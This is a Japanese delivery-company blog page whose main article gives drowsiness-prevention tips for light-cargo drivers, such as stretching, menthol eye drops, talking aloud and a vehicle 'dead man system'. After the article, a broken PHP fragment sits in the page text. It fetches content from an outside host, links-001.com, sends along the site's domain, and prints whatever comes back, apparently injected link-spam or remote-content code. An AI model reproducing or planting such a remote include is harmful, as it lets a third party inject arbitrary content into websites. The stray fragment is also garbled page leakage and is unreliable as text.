前へ
次へ

日本は小型の軽貨物運送車両がオススメな理由

航空、鉄路、陸路、海運まで様々な軽貨物運送手段があります。一般的には一度の運送で多くの軽貨物を運べる

more

軽貨物運送ドライバーを支える運行管理者とは?

軽貨物運送事業者に所属している軽貨物運送ドライバーなら、日常的に業務間で連携する運行管理者。表舞台で

more

軽貨物ドライバーが業務中の事故を防ぐ方法

フリーランスや業務委託などの働き方が認められている現在、軽貨物運送は自動車運転免許があれば成約なく誰

more

軽貨物運送ドライバーの眠気防止法

軽貨物運送ドライバーの敵といえば、やはり「眠気」。生理現象なので無くす事は出来ませんが、もし軽貨物運送中に寝落ちしてしまったら事故になってしまいます。安全の確保が最優先である軽貨物運送ドライバーにとって事故はご法度です。そこで今回は、ベテラン軽貨物運送ドライバーの眠気防止対策をいくつかご紹介していきます!軽貨物運送ドライバーの眠気防止対策①軽貨物運送車両に乗務する前にストレッチをする・・・・・身体をすこし動かすだけで、意識レベルがかなり高まります。その為、軽貨物運送車両に乗務する前にラジオ体操をしたり、簡単なストレッチをするようにしましょう。軽貨物運送ドライバーの眠気防止対策②洗顔と目薬を使う・・・・・メンソールが含まれている洗顔フォームや目薬を使うことで、感覚器官に刺激を与えて、強制的に目を覚ましましょう。軽貨物運送ドライバーの眠気防止対策③軽貨物運送車両に乗務している間、独り言をつぶやき続ける・・・・・無言になってしまうと意識レベルが下がってしまうので、できうる限り独り言をつぶやいたり、考え事をあえて口に出してみたり、歌を熱唱しましょう。ここまでご紹介してきたのが、軽貨物運送ドライバー自身でできる眠気防止対策です。次は軽貨物運送車両そのものに対する眠気防止の施策をご紹介します。それはずばり「デッドマンシステム」の設置・運用です。デッドマンシステムとは一定時間以上、運転操作が無いと軽貨物運送ドライバーに異常が発生したものとみなし、自動的に停車させるというフェイルセーフシステムです。これにより居眠り以外の意識障害や軽貨物運送車両乗務中に急死してしまっても安全に停車させることができ、交通事故を防ぐ事ができます。軽貨物運送ドライバーの眠気防止対策まとめ。人間はミスをしてしまう生き物なので、軽貨物運送ドライバー自身の事故対策はもちろん、ミスを検知してリカバリーできるフールプルーフ施策の両面から、居眠り対策を実施していかなければならないでしょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top